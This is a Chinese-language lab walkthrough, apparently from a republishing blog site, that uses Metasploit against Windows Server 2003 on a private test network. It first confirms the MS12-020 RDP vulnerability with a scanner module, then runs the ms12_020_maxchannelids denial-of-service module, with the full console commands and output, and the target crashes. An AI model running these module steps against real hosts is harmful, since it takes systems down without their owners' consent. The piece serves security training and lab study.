使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
来源:互联网 发布:网页铃声制作软件 编辑:程序博客网 时间:2024/05/20 10:14
前言
攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。
0x01 实验环境
攻击机:kali linux
ip:192.168.8.130
目标机:windows server 2003 Enterprise x64 SP2
ip:192.168.8.129
0x02 漏洞验证
使用msf的模块:auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞
msf > use auxiliary/scanner/rdp/ms12_020_checkmsf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129msf auxiliary(ms12_020_check) > info Name: MS12-020 Microsoft Remote Desktop Checker Module: auxiliary/scanner/rdp/ms12_020_check License: Metasploit Framework License (BSD) Rank: NormalProvided by: Royce Davis "R3dy" <rdavis@accuvant.com> Brandon McCann "zeknox" <bmccann@accuvant.com>Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.8.129 yes The target address range or CIDR identifier RPORT 3389 yes Remote port running RDP (TCP) THREADS 100 yes The number of concurrent threadsDescription: This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.References: https://cvedetails.com/cve/CVE-2012-0002/ https://technet.microsoft.com/en-us/library/security/MS12-020 http://technet.microsoft.com/en-us/security/bulletin/ms12-020 https://www.exploit-db.com/exploits/18606 https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse
运行后显示目标系统具有此漏洞:
msf auxiliary(ms12_020_check) > run[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
0x03 漏洞利用
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelidsmsf auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.8.129 yes The target address RPORT 3389 yes The target port (TCP)msf auxiliary(ms12_020_maxchannelids) > run[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down[*] Auxiliary module execution completed
运行模块后,目标系统windows server 2003 蓝屏宕机:
阅读全文
0 0
- 使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
- 使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
- metasploit对IE浏览器的极光漏洞进行渗透利用
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
- Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020)
- 利用MS12-020进行的一次简单渗透测试
- MS12-020 漏洞利用程序
- Metasploit(MS12-020)
- MS12-020 远程桌面漏洞
- metasploit使用msf编码器
- kali 漏洞利用metasploit
- MS12-032的POC
- kali 下metasploit (msf)初始化使用
- 利用Metasploit测试一个古老的IE8漏洞(编号CVE-2012-1875)
- Metasploit的使用测试
- MSF利用最新IE最新漏洞
- 使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)
- 第9章 机器学习实战之树回归
- Python SQLite3使用
- Linux环境变量详解
- Android svg VectorDrawable 动画效果
- cuda
- 使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
- Android VectorDrawable svg 命令详细综述
- GitHub与Git的区别与入门
- Vpn与ss/ssr的区别
- kafka必会的操作命令
- 获取dom的最终的css属性值
- eclipse反向检出javabean
- 程序媛从实习到Offer:十几家面试汇总(内附薪资)
- LeetCode简易题解--105、106